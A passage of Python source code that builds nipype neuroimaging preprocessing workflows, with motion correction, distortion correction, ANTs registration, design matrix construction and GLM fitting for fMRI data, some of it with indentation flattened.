apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = smoothingKernel
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### Xmat ###
###################################
build_xmat = Node(Build_Xmat(),name="build_xmat")
build_xmat.inputs.header = False
build_xmat.inputs.delim = '\t'
build_xmat.inputs.fillNa = True
build_xmat.inputs.dur = 8
###################################
### CONTRAST Xmat ###
###################################
def buildContrastXmat(covFile, onsetsFile, TR):
    """Build, plot and save a single-column contrast design matrix (right - left).

    Boxcar regressors (8 s events, right = 1, left/other = -1) are convolved
    with the Glover HRF and concatenated with the nuisance covariates. Writes
    'Xmat_con.csv' and a heatmap 'Xmat_con.png' to the working directory.

    Args:
        covFile: csv of nuisance covariates, one row per TR
        onsetsFile: tab-delimited onsets file (stim label + onset in seconds,
            column order inferred from the first cell's dtype)
        TR: repetition time in seconds

    Returns:
        (plotFile, xmatFile): file names of the saved figure and design matrix
    """
    import matplotlib
    matplotlib.use('Agg')
    from nipy.modalities.fmri.hemodynamic_models import glover_hrf
    import matplotlib.pyplot as plt
    import seaborn as sns
    import pandas as pd
    import numpy as np
    # Event duration of 8 s expressed in TRs; cast to int so it can be used
    # as a label-slice bound below.
    dur = int(np.ceil(8. / TR))
    header = None
    delim = '\t'
    hrf = glover_hrf(tr=TR, oversampling=1)
    # Just a single file
    C = pd.read_csv(covFile)
    C['intercept'] = 1
    O = pd.read_csv(onsetsFile, header=header, delimiter=delim)
    if header is None:
        # Column order in the raw file is ambiguous; infer from first cell type.
        if isinstance(O.iloc[0, 0], str):
            O.columns = ['Stim', 'Onset']
        else:
            O.columns = ['Onset', 'Stim']
    # Convert onset times (seconds) to TR indices
    O['Onset'] = O['Onset'].apply(lambda x: int(np.floor(x / TR)))
    # Build dummy codes
    # Subtract one from onsets row, because pd DFs are 0-indexed but TRs are 1-indexed
    X = pd.DataFrame(columns=['contrast'], data=np.zeros([C.shape[0], 1]))
    for _, row in O.iterrows():
        # Use dur-1 for the slice end because .loc slicing is end-inclusive.
        # (.ix was removed in pandas 1.0; .loc is the label-based replacement
        # and behaves identically here on the default integer index.)
        start = row['Onset'] - 1
        value = 1 if row['Stim'] == 'right' else -1
        X.loc[start:start + dur - 1, 'contrast'] = value
    X['contrast'] = np.convolve(hrf, X.contrast.values)[:X.shape[0]]
    X = pd.concat([X, C], axis=1)
    X = X.fillna(0)
    matplotlib.rcParams['axes.edgecolor'] = 'black'
    matplotlib.rcParams['axes.linewidth'] = 2
    fig, ax = plt.subplots(1, figsize=(12, 10))
    ax = sns.heatmap(X, cmap='gray', cbar=False, ax=ax)
    for _, spine in ax.spines.items():
        spine.set_visible(True)
    # Hide all but the first y tick label to keep the figure readable.
    for i, label in enumerate(ax.get_yticklabels()):
        if i > 0 and i < X.shape[0]:
            label.set_visible(False)
    plotFile = 'Xmat_con.png'
    fig.savefig(plotFile)
    plt.close(fig)
    del fig
    xmatFile = 'Xmat_con.csv'
    X.to_csv(xmatFile, index=False)
    return plotFile, xmatFile
build_xmat_con = Node(interface=Function(input_names=['covFile','onsetsFile','TR'],
output_names=['plot','xmat'],
function=buildContrastXmat),
name='build_xmat_con')
###################################
### MVPA Xmat ###
###################################
def buildMVPAXmat(covFile, onsetsFile, TR):
    """Build, plot and save an MVPA design matrix with one regressor per event.

    Each left/right event gets its own uniquely-named boxcar regressor (8 s
    duration) convolved with the Glover HRF; nuisance covariates are appended.
    Writes 'Xmat_mvpa.csv' and a heatmap 'Xmat_mvpa.png' to the working
    directory.

    Args:
        covFile: csv of nuisance covariates, one row per TR
        onsetsFile: tab-delimited onsets file (stim label + onset in seconds,
            column order inferred from the first cell's dtype)
        TR: repetition time in seconds

    Returns:
        (plotFile, xmatFile): file names of the saved figure and design matrix
    """
    import matplotlib
    matplotlib.use('Agg')
    from nipy.modalities.fmri.hemodynamic_models import glover_hrf
    import matplotlib.pyplot as plt
    import seaborn as sns
    import pandas as pd
    import numpy as np
    # Event duration of 8 s expressed in TRs; cast to int for label slicing.
    dur = int(np.ceil(8. / TR))
    header = None
    delim = '\t'
    hrf = glover_hrf(tr=TR, oversampling=1)
    # Just a single file
    C = pd.read_csv(covFile)
    C['intercept'] = 1
    O = pd.read_csv(onsetsFile, header=header, delimiter=delim)
    if header is None:
        # Column order in the raw file is ambiguous; infer from first cell type.
        if isinstance(O.iloc[0, 0], str):
            O.columns = ['Stim', 'Onset']
        else:
            O.columns = ['Onset', 'Stim']
    # Convert onset times (seconds) to TR indices
    O['Onset'] = O['Onset'].apply(lambda x: int(np.floor(x / TR)))
    # Uniquify stims so every event gets its own regressor (right_1, left_1, ...)
    leftCount = 1
    rightCount = 1
    newStims = []
    for _, row in O.iterrows():
        if row['Stim'] == 'right':
            newStims.append('right_' + str(rightCount))
            rightCount += 1
        elif row['Stim'] == 'left':
            newStims.append('left_' + str(leftCount))
            leftCount += 1
    O['Stim'] = newStims
    # Build dummy codes
    # Subtract one from onsets row, because pd DFs are 0-indexed but TRs are 1-indexed
    X = pd.DataFrame(columns=O.Stim.unique(), data=np.zeros([C.shape[0], len(O.Stim.unique())]))
    for _, row in O.iterrows():
        # Use dur-1 for the slice end because .loc slicing is end-inclusive.
        # (.ix was removed in pandas 1.0; .loc behaves identically here on the
        # default integer index.)
        start = row['Onset'] - 1
        X.loc[start:start + dur - 1, row['Stim']] = 1
    # Sort regressor columns alphabetically. (reindex_axis was removed in
    # pandas 1.0; plain column selection is the equivalent.)
    X = X[sorted(X.columns)]
    for i in range(X.shape[1]):
        X.iloc[:, i] = np.convolve(hrf, X.iloc[:, i])[:X.shape[0]]
    X = pd.concat([X, C], axis=1)
    X = X.fillna(0)
    matplotlib.rcParams['axes.edgecolor'] = 'black'
    matplotlib.rcParams['axes.linewidth'] = 2
    fig, ax = plt.subplots(1, figsize=(12, 10))
    ax = sns.heatmap(X, cmap='gray', cbar=False, ax=ax)
    for _, spine in ax.spines.items():
        spine.set_visible(True)
    # Hide all but the first y tick label to keep the figure readable.
    for i, label in enumerate(ax.get_yticklabels()):
        if i > 0 and i < X.shape[0]:
            label.set_visible(False)
    plotFile = 'Xmat_mvpa.png'
    fig.savefig(plotFile)
    plt.close(fig)
    del fig
    xmatFile = 'Xmat_mvpa.csv'
    X.to_csv(xmatFile, index=False)
    return plotFile, xmatFile
build_xmat_mvpa = Node(interface=Function(input_names=['covFile','onsetsFile','TR'],
output_names=['plot','xmat'],
function=buildMVPAXmat),
name='build_xmat_mvpa')
###################################
### GLM CONTRAST###
###################################
glm = Node(GLM(),name="glm")
glm.inputs.detrend = True
###################################
### GLM CONTRAST###
###################################
glm_con = Node(GLM(),name="glm_con")
glm_con.inputs.detrend = True
glm_con.inputs.prependName = 'con'
###################################
### GLM MVPA###
###################################
glm_mvpa = Node(GLM(),name="glm_mvpa")
glm_mvpa.inputs.detrend = True
glm_mvpa.inputs.prependName = 'mvpa'
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..data..fmriData..' + subject_id + '..','')]
###################################
### FILE GETTER (used to run alt glms after preproc) ###
###################################
# def fileGetter(subject_id,output_dir):
# '''
# Gets onsets txt file given path to a .nii.gz file.
# Assumes both files are named the same.
# '''
# import os
# #Get final epi
# fPieces = os.path.split(fName)
# scanId = fPieces[-1].split('.nii.gz')[0]
# return os.path.join(fPieces[0],scanId+'.txt')
# get_onsets = Node(interface=Function(input_names=['fName'],
# output_names=['onsetsFile'],
# function=getOnsets),
# name='get_onsets')
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(func_scans, realign_fsl, [('scan','in_file')]),
(func_scans, get_tr, [('scan','fName')]),
(func_scans, get_onsets, [('scan','fName')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(datasource, brain_extraction_ants, [('struct','anatomical_image')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(get_tr, build_xmat, [('TR','TR')]),
(get_onsets, build_xmat, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat, [('covariates','covFile')]),
(build_xmat, datasink, [('xmat', 'functional.@xmat'),
('plot', 'functional.@xmatplot')]),
(build_xmat, glm, [('xmat','xmatFile')]),
(smooth, glm, [('smoothed_file','epiFile')]),
(glm, datasink, [('betaImage','glm.@beta'),
('tstatImage','glm.@tstat'),
('pvalImage','glm.@pval')]),
(get_tr, build_xmat_con, [('TR','TR')]),
(get_onsets, build_xmat_con, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat_con, [('covariates','covFile')]),
(build_xmat_con, datasink, [('xmat', 'functional.@xmatcon'),
('plot', 'functional.@xmatconplot')]),
(build_xmat_con, glm_con, [('xmat','xmatFile')]),
(smooth, glm_con, [('smoothed_file','epiFile')]),
(glm_con, datasink, [('betaImage','glm.@betacon'),
('tstatImage','glm.@tstatcon'),
('pvalImage','glm.@pvalcon')]),
(get_tr, build_xmat_mvpa, [('TR','TR')]),
(get_onsets, build_xmat_mvpa, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat_mvpa, [('covariates','covFile')]),
(build_xmat_mvpa, datasink, [('xmat', 'functional.@xmatmvpa'),
('plot', 'functional.@xmatmvpaplot')]),
(build_xmat_mvpa, glm_mvpa, [('xmat','xmatFile')]),
(smooth, glm_mvpa, [('smoothed_file','epiFile')]),
(glm_mvpa, datasink, [('betaImage','glm.@betamvpa'),
('tstatImage','glm.@tstatmvpa'),
('pvalImage','glm.@pvalmvpa')]),
(apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, datasink, [('smoothed_file','functional.@smooth')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
## Old workflow using a single glm
# workflow.connect([
# (func_scans, realign_fsl, [('scan','in_file')]),
# (func_scans, get_tr, [('scan','fName')]),
# (func_scans, get_onsets, [('scan','fName')]),
# (realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
# (realign_fsl, plot_qa, [('out_file','dat_img')]),
# (realign_fsl, art, [('out_file','realigned_files'),
# ('par_file','realignment_parameters')]),
# (realign_fsl, mean_epi, [('out_file','in_file')]),
# (realign_fsl, make_cov, [('par_file','realignment_parameters')]),
# (mean_epi, compute_mask, [('out_file','mean_volume')]),
# (compute_mask, art, [('brain_mask','mask_file')]),
# (art, make_cov, [('outlier_files','spike_id')]),
# (datasource, brain_extraction_ants, [('struct','anatomical_image')]),
# (brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
# (mean_epi, coregistration, [('out_file','moving_image')]),
# (brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
# (coregistration, merge_transforms, [('composite_transform','in2')]),
# (normalization, merge_transforms, [('composite_transform','in1')]),
# (merge_transforms, apply_transforms, [('out','transforms')]),
# (realign_fsl, apply_transforms, [('out_file','input_image')]),
# (apply_transforms, mean_norm_epi, [('output_image','in_file')]),
# (mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
# (get_tr, build_xmat, [('TR','TR')]),
# (get_onsets, build_xmat, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat, [('covariates','covFile')]),
# (build_xmat, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat, glm, [('xmat','xmatFile')]),
# (get_tr, build_xmat_con, [('TR','TR')]),
# (get_onsets, build_xmat_con, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat_con, [('covariates','covFile')]),
# (build_xmat_con, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat_con, glm_con, [('xmat','xmatFile')]),
# (smooth, glm_con, [('smoothed_file','epiFile')]),
# (get_tr, build_xmat_mvpa, [('TR','TR')]),
# (get_onsets, build_xmat_mvpa, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat_mvpa, [('covariates','covFile')]),
# (build_xmat_mvpa, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat_mvpa, glm_mvpa, [('xmat','xmatFile')]),
# (smooth, glm_mvpa, [('smoothed_file','epiFile')]),
# (glm_mvpa, datasink, [('betaImage','glm.@beta'),
# ('tstatImage','glm.@tstat'),
# ('pvalImage','glm.@pval')]),
# (smooth, glm, [('smoothed_file','epiFile')]),
# (glm, datasink, [('betaImage','glm.@beta'),
# ('tstatImage','glm.@tstat'),
# ('pvalImage','glm.@pval')]),
# (apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
# (apply_transforms, smooth, [('output_image','in_file')]),
# (smooth, datasink, [('smoothed_file','functional.@smooth')]),
# (plot_realign, datasink, [('plot','functional.@plot_realign')]),
# (plot_qa, datasink, [('plot','functional.@plot_qa')]),
# (plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
# (make_cov, datasink, [('covariates','functional.@covariates')]),
# (brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
# (normalization, datasink, [('warped_image','structural.@normalize')])
# ])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
def Pinel_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None):
    """
    Create a nipype preprocessing workflow to analyze data from the Pinel localizer task.

    Pre-processing steps include:
        Distortion correction (fsl topup)
        Realignment/Motion Correction (fsl)
        Artifact Detection (nipype)
        Brain Extraction + Bias Correction (ANTs)
        Coregistration (rigid) (ANTs)
        Normalization to MNI 152 2mm (non-linear) (ANTs)
        Quality Control figure generation:
            - Realignment parameters
            - Quality check of mean signal, sd and frame differences
            - Normalization check

    Template files (MNI and ANTs/OASIS) are located via
    cosanlab_preproc.utils.get_resource_path() rather than passed as arguments.

    Args:
        base_dir: path to raw, BIDS-organized data folder with subjects listed as sub-folders
        output_dir: path where final outputted files and figures should go
        subject_id: subject to run (should match folder name, e.g. 'sub-01')

    Return:
        workflow: A complete nipype workflow
    """
    import os
    from glob import glob
    import matplotlib
    # Non-interactive backend: QC figures are written to disk on (possibly headless) nodes
    matplotlib.use('Agg')
    import nibabel as nib
    from nipype.interfaces.io import DataSink, DataGrabber
    from nipype.interfaces.utility import Merge, IdentityInterface, Function
    from nipype.pipeline.engine import Node, Workflow
    from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Down_Sample_Precision
    from cosanlab_preproc.utils import get_resource_path
    from bids.grabbids import BIDSLayout
    from nipype.interfaces.nipy.preprocess import ComputeMask
    from nipype.algorithms.rapidart import ArtifactDetect
    from nipype.interfaces.ants.segmentation import BrainExtraction
    from nipype.interfaces.ants import Registration, ApplyTransforms
    from nipype.interfaces.fsl import MCFLIRT, TOPUP
    from nipype.interfaces.fsl import ApplyTOPUP as APPLYTOPUP
    from nipype.interfaces.fsl import Merge as MERGE
    from nipype.interfaces.fsl.maths import MeanImage
    from nipype.interfaces.fsl.utils import Smooth
    ###################################
    ### GLOBALS, PATHS ###
    ###################################
    MNItemplate = os.path.join(get_resource_path(), 'MNI152_T1_2mm_brain.nii.gz')
    MNItemplatehasskull = os.path.join(get_resource_path(), 'MNI152_T1_2mm.nii.gz')
    bet_ants_template = os.path.join(get_resource_path(), 'OASIS_template.nii.gz')
    bet_ants_prob_mask = os.path.join(get_resource_path(), 'OASIS_BrainCerebellumProbabilityMask.nii.gz')
    bet_ants_registration_mask = os.path.join(get_resource_path(), 'OASIS_BrainCerebellumRegistrationMask.nii.gz')
    # Only functional runs collected with these BIDS acquisition labels are processed
    acquisitions = [
        'p1Xs2X3mmXsl48Xap',
        'p1Xs4X3mmXsl48Xap',
        'p1Xs6X3mmXsl48Xap',
        'p1Xs8X3mmXsl48Xap',
    ]
    # Phase-encoding file for topup; assumed to live at the top of the raw data tree
    encoding_file = os.path.join(base_dir, 'encoding_file.txt')
    ###################################
    ### DATA INPUT ###
    ###################################
    layout = BIDSLayout(base_dir)
    # BIDS needs the 'sub-' part of the subject id removed
    subId = subject_id[4:]
    # Straight up grab the single anat nifti
    anat = layout.get(subject=subId, type='T1w', extensions='.nii.gz')[0].filename
    # Get a list of all epis and wrap them in an iterable node so the
    # functional branch of the workflow runs once per scan
    funcs = [f.filename for f in layout.get(subject=subId, type='bold', extensions='.nii.gz') if f.acquisition in acquisitions]
    func_scans = Node(IdentityInterface(fields=['scan']), name='func_scans')
    func_scans.iterables = ('scan', funcs)
    # Get a list of all distortion correction scans (AP/PA pairs)
    dis_corrs = [f.filename for f in layout.get(subject=subId, type='bold', extensions='.nii.gz', task='discorr')]
    #####################################
    ## DISTORTION CORRECTION ##
    #####################################
    # Merge AP and PA distortion correction scans into one 4D file for topup
    merge_discorr = Node(interface=MERGE(dimension='t'), name='merge_discorr')
    merge_discorr.inputs.output_type = 'NIFTI_GZ'
    merge_discorr.inputs.in_files = dis_corrs
    # Create distortion correction (fieldcoef/movpar) map
    topup = Node(interface=TOPUP(), name='topup')
    topup.inputs.output_type = 'NIFTI_GZ'
    topup.inputs.encoding_file = encoding_file
    # Apply distortion correction to the task scans (jacobian modulation method)
    apply_topup = Node(interface=APPLYTOPUP(), name='apply_topup')
    apply_topup.inputs.output_type = 'NIFTI_GZ'
    apply_topup.inputs.method = 'jac'
    apply_topup.inputs.encoding_file = encoding_file
    ###################################
    ### REALIGN ###
    ###################################
    realign_fsl = Node(MCFLIRT(), name="realign")
    realign_fsl.inputs.cost = 'mutualinfo'
    realign_fsl.inputs.mean_vol = True
    realign_fsl.inputs.output_type = 'NIFTI_GZ'
    realign_fsl.inputs.save_mats = True
    realign_fsl.inputs.save_rms = True
    realign_fsl.inputs.save_plots = True
    ###################################
    ### MEAN EPIs ###
    ###################################
    # For coregistration after realignment
    mean_epi = Node(MeanImage(), name='mean_epi')
    mean_epi.inputs.dimension = 'T'
    # For after normalization is done, to plot checks
    mean_norm_epi = Node(MeanImage(), name='mean_norm_epi')
    mean_norm_epi.inputs.dimension = 'T'
    ###################################
    ### MASK, ART, COV CREATION ###
    ###################################
    compute_mask = Node(ComputeMask(), name='compute_mask')
    compute_mask.inputs.m = .05
    # Spike/outlier detection on the realigned data
    art = Node(ArtifactDetect(), name='art')
    art.inputs.use_differences = [True, False]
    art.inputs.use_norm = True
    art.inputs.norm_threshold = 1
    art.inputs.zintensity_threshold = 3
    art.inputs.mask_type = 'file'
    art.inputs.parameter_source = 'FSL'
    # Combines motion parameters + art spikes into a single covariates file
    make_cov = Node(Create_Covariates(), name='make_cov')
    ###################################
    ### BRAIN EXTRACTION ###
    ###################################
    brain_extraction_ants = Node(BrainExtraction(), name='brain_extraction')
    brain_extraction_ants.inputs.anatomical_image = anat  # from BIDS
    brain_extraction_ants.inputs.dimension = 3
    brain_extraction_ants.inputs.use_floatingpoint_precision = 1
    brain_extraction_ants.inputs.num_threads = 12
    brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
    brain_extraction_ants.inputs.keep_temporary_files = 1
    brain_extraction_ants.inputs.brain_template = bet_ants_template
    brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
    ###################################
    ### COREGISTRATION ###
    ###################################
    # Rigid-body registration of the mean EPI to the extracted anatomical
    coregistration = Node(Registration(), name='coregistration')
    coregistration.inputs.float = False
    coregistration.inputs.output_transform_prefix = "meanEpi2highres"
    coregistration.inputs.transforms = ['Rigid']
    # One transform stage (Rigid), so exactly one parameter tuple
    coregistration.inputs.transform_parameters = [(0.1,)]
    coregistration.inputs.number_of_iterations = [[1000, 500, 250, 100]]
    coregistration.inputs.dimension = 3
    coregistration.inputs.num_threads = 12
    coregistration.inputs.write_composite_transform = True
    coregistration.inputs.collapse_output_transforms = True
    coregistration.inputs.metric = ['MI']
    coregistration.inputs.metric_weight = [1]
    coregistration.inputs.radius_or_number_of_bins = [32]
    coregistration.inputs.sampling_strategy = ['Regular']
    coregistration.inputs.sampling_percentage = [0.25]
    coregistration.inputs.convergence_threshold = [1.e-8]
    coregistration.inputs.convergence_window_size = [10]
    coregistration.inputs.smoothing_sigmas = [[3, 2, 1, 0]]
    coregistration.inputs.sigma_units = ['mm']
    coregistration.inputs.shrink_factors = [[8, 4, 2, 1]]
    coregistration.inputs.use_estimate_learning_rate_once = [True]
    coregistration.inputs.use_histogram_matching = [False]
    coregistration.inputs.initial_moving_transform_com = True
    coregistration.inputs.output_warped_image = True
    coregistration.inputs.winsorize_lower_quantile = 0.01
    coregistration.inputs.winsorize_upper_quantile = 0.99
    ###################################
    ### NORMALIZATION ###
    ###################################
    # ANTS steps through several different iterations starting with linear, affine and
    # finally non-linear diffeomorphic alignment. The settings below increase the run
    # time but yield a better alignment solution
    normalization = Node(Registration(), name='normalization')
    normalization.inputs.float = False
    normalization.inputs.collapse_output_transforms = True
    normalization.inputs.convergence_threshold = [1e-06]
    normalization.inputs.convergence_window_size = [10]
    normalization.inputs.dimension = 3
    normalization.inputs.fixed_image = MNItemplate  # MNI 152 2mm brain
    normalization.inputs.initial_moving_transform_com = True
    normalization.inputs.metric = ['MI', 'MI', 'CC']
    normalization.inputs.metric_weight = [1.0] * 3
    normalization.inputs.number_of_iterations = [[1000, 500, 250, 100],
                                                 [1000, 500, 250, 100],
                                                 [100, 70, 50, 20]]
    normalization.inputs.num_threads = 12
    normalization.inputs.output_transform_prefix = 'anat2template'
    normalization.inputs.output_inverse_warped_image = True
    normalization.inputs.output_warped_image = True
    normalization.inputs.radius_or_number_of_bins = [32, 32, 4]
    normalization.inputs.sampling_percentage = [0.25, 0.25, 1]
    normalization.inputs.sampling_strategy = ['Regular',
                                              'Regular',
                                              'None']
    normalization.inputs.shrink_factors = [[8, 4, 2, 1]] * 3
    normalization.inputs.sigma_units = ['vox'] * 3
    normalization.inputs.smoothing_sigmas = [[3, 2, 1, 0]] * 3
    normalization.inputs.terminal_output = 'stream'
    normalization.inputs.transforms = ['Rigid', 'Affine', 'SyN']
    normalization.inputs.transform_parameters = [(0.1,),
                                                 (0.1,),
                                                 (0.1, 3.0, 0.0)]
    normalization.inputs.use_histogram_matching = True
    normalization.inputs.winsorize_lower_quantile = 0.005
    normalization.inputs.winsorize_upper_quantile = 0.995
    normalization.inputs.write_composite_transform = True
    ###################################
    ### APPLY TRANSFORMS AND SMOOTH ###
    ###################################
    # The nodes above compute the required transformation matrices but don't actually
    # apply them to the data. Here we're merging both matrices and applying them in a
    # single transformation step to reduce the amount of data interpolation.
    # NOTE(review): 'iterfield' is a MapNode-only argument; on a plain Node it is
    # silently ignored -- kept for fidelity with the original configuration.
    merge_transforms = Node(Merge(2), iterfield=['in2'], name='merge_transforms')
    apply_transforms = Node(ApplyTransforms(), iterfield=['input_image'], name='apply_transforms')
    apply_transforms.inputs.input_image_type = 3
    apply_transforms.inputs.float = False
    apply_transforms.inputs.num_threads = 12
    apply_transforms.inputs.environ = {}
    apply_transforms.inputs.interpolation = 'BSpline'
    apply_transforms.inputs.invert_transform_flags = [False, False]
    apply_transforms.inputs.terminal_output = 'stream'
    apply_transforms.inputs.reference_image = MNItemplate
    # Use FSL for smoothing
    smooth = Node(Smooth(), name='smooth')
    smooth.inputs.sigma = 6.0
    #####################################
    ### DOWNSAMPLE PRECISION ###
    #####################################
    # Reduce on-disk precision of the final functional output
    down_samp = Node(Down_Sample_Precision(), name='down_samp')
    ###################################
    ### PLOTS ###
    ###################################
    plot_realign = Node(Plot_Realignment_Parameters(), name="plot_realign")
    plot_qa = Node(Plot_Quality_Control(), name="plot_qa")
    plot_normalization_check = Node(Plot_Coregistration_Montage(), name="plot_normalization_check")
    plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
    ###################################
    ### DATA OUTPUT ###
    ###################################
    # Collect all final outputs in the output dir and get rid of file name additions
    datasink = Node(DataSink(), name='datasink')
    datasink.inputs.base_directory = output_dir
    datasink.inputs.container = subject_id
    datasink.inputs.substitutions = [('_scan_..mnt..Raw..' + subject_id + '..func..', ''),
                                     (subject_id + '_acq-p1X', ''),
                                     ('X3mmXsl48Xap_bold.nii.gz', '')]
    ###################################
    ### HOOK IT ALL CAPTAIN! ###
    ###################################
    workflow = Workflow(name='Preprocessing')
    workflow.base_dir = os.path.join(base_dir, subject_id)
    workflow.connect([
        (merge_discorr, topup, [('merged_file', 'in_file')]),
        (topup, apply_topup, [('out_fieldcoef', 'in_topup_fieldcoef'),
                              ('out_movpar', 'in_topup_movpar')]),
        (func_scans, apply_topup, [('scan', 'in_files')]),
        (apply_topup, realign_fsl, [('out_corrected', 'in_file')]),
        (realign_fsl, plot_realign, [('par_file', 'realignment_parameters')]),
        (realign_fsl, plot_qa, [('out_file', 'dat_img')]),
        (realign_fsl, art, [('out_file', 'realigned_files'),
                            ('par_file', 'realignment_parameters')]),
        (realign_fsl, mean_epi, [('out_file', 'in_file')]),
        (realign_fsl, make_cov, [('par_file', 'realignment_parameters')]),
        (mean_epi, compute_mask, [('out_file', 'mean_volume')]),
        (compute_mask, art, [('brain_mask', 'mask_file')]),
        (art, make_cov, [('outlier_files', 'spike_id')]),
        (brain_extraction_ants, coregistration, [('BrainExtractionBrain', 'fixed_image')]),
        (mean_epi, coregistration, [('out_file', 'moving_image')]),
        (brain_extraction_ants, normalization, [('BrainExtractionBrain', 'moving_image')]),
        (coregistration, merge_transforms, [('composite_transform', 'in2')]),
        (normalization, merge_transforms, [('composite_transform', 'in1')]),
        (merge_transforms, apply_transforms, [('out', 'transforms')]),
        (realign_fsl, apply_transforms, [('out_file', 'input_image')]),
        (apply_transforms, mean_norm_epi, [('output_image', 'in_file')]),
        (mean_norm_epi, plot_normalization_check, [('out_file', 'wra_img')]),
        (apply_transforms, smooth, [('output_image', 'in_file')]),
        (smooth, down_samp, [('smoothed_file', 'in_file')]),
        (down_samp, datasink, [('out_file', 'functional.@down_samp')]),
        (plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
        (plot_qa, datasink, [('plot', 'functional.@plot_qa')]),
        (plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
        (make_cov, datasink, [('covariates', 'functional.@covariates')]),
        (brain_extraction_ants, datasink, [('BrainExtractionBrain', 'structural.@struct')]),
        (normalization, datasink, [('warped_image', 'structural.@normalize')])
    ])
    # Only render the workflow graph once per output directory
    if not os.path.exists(os.path.join(output_dir, 'Preprocsteps.png')):
        workflow.write_graph(dotfilename=os.path.join(output_dir, 'Preprocsteps'), format='png')
    return workflow
def NeuroExpSampling_PreProc_Pipeline(base_dir=None, output_dir=None, subject_id=None):
"""
Create a nipype preprocessing workflow to analyze data from the Neuro-Experience-Sampling scan data.
This data was originally collected with SMS 8, TR = 419ms.
Pre-processing steps include:
Distortion correction (fsl)
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Low-pass filtering (nltools/nilearn) - filter out high-freq SMS physio noise
Quality Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
import nibabel as nib
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface, Function
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Down_Sample_Precision
from cosanlab_preproc.utils import get_resource_path
from bids.grabbids import BIDSLayout
from nipype.interfaces.nipy.preprocess import ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
